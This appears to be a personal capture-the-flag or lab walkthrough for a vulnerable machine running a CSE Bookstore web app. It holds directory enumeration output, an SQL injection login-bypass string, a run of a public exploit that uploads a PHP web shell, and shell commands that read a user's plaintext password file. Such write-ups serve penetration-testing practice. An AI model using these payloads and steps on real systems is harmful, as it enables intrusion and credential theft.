2 :80

http://192.168.129.111/
Apache 2 Splash Page

$ gobuster dir -u http://192.168.129.111 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
2021/08/12 10:53:33 Starting gobuster in directory enumeration mode
===============================================================
/profile.php          (Status: 302) [Size: 7247] [--> http://192.168.129.111/index.php]
/index.php            (Status: 200) [Size: 3468]
/index.html           (Status: 200) [Size: 10918]
/header.php           (Status: 200) [Size: 1666]
/admin                (Status: 301) [Size: 318] [--> http://192.168.129.111/admin/]
/store                (Status: 301) [Size: 318] [--> http://192.168.129.111/store/]
/registration.php     (Status: 200) [Size: 9409]
/logout.php           (Status: 200) [Size: 75]
/robots.txt           (Status: 200) [Size: 14]
/dashboard.php        (Status: 302) [Size: 10272] [--> http://192.168.129.111/index.php]
/secret               (Status: 301) [Size: 319] [--> http://192.168.129.111/secret/]
/leftbar.php          (Status: 200) [Size: 1837]
/forgot-password.php  (Status: 200) [Size: 2763]
/gym                  (Status: 301) [Size: 316] [--> http://192.168.129.111/gym/]
/hitcounter.txt       (Status: 200) [Size: 1]

http://192.168.129.111/index.php
CRM Login Page

http://192.168.129.111/admin/
Admin Login to CRM Admin

http://192.168.129.111/store/
Online CSE Bookstore

http://192.168.129.111/store/admin.php
Admin Login 2017

CSE Bookstore has expoits
https://www.exploit-db.com/exploits/48960 - Auth Bypass
https://www.exploit-db.com/exploits/47887 - Unauth RCE

#  Auth Bypass works
# login to http://192.168.129.111/store/admin.php
using admin:%' or '1'='1 

# had to modify script for RCE to allow opening shell
# pass url to directory - not login page

 python 47887.py http://192.168.129.111/store/
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://192.168.129.111/store/bootstrap/img/9JtRhAG8E9.php
> Example command usage: http://192.168.129.111/store/bootstrap/img/ooNLYWSSBz.php?cmd=whoami
RCE $
# shell breaks due to string error but file is uploaded

http://192.168.129.111/store/bootstrap/img/9JtRhAG8E9.php?cmd=whoami;id;hostname
www-data uid=33(www-data) gid=33(www-data) groups=33(www-data) funbox3 funbox3

# cant seem to get proper rev shell time to enumerate

RCE $ ls -la /home
total 12
drwxr-xr-x  3 root root 4096 Jul 30  2020 .
drwxr-xr-x 20 root root 4096 Oct 30  2020 ..
drwxr-xr-x  3 tony tony 4096 Aug 12 19:11 tony

RCE $ ls -la /home/tony
total 28
drwxr-xr-x 3 tony tony 4096 Aug 12 19:11 .
drwxr-xr-x 3 root root 4096 Jul 30  2020 ..
-rw------- 1 tony tony    0 Oct 30  2020 .bash_history
-rw-r--r-- 1 tony tony  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 tony tony 3771 Feb 25  2020 .bashrc
drwx------ 2 tony tony 4096 Aug 12 19:11 .cache
-rw-r--r-- 1 tony tony  807 Feb 25  2020 .profile
-rw-rw-r-- 1 tony tony   70 Jul 31  2020 password.txt

RCE $ cat /home/tony/password.txt
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin
Previous3 :22 ssh tony > rootNext1 recon

Last updated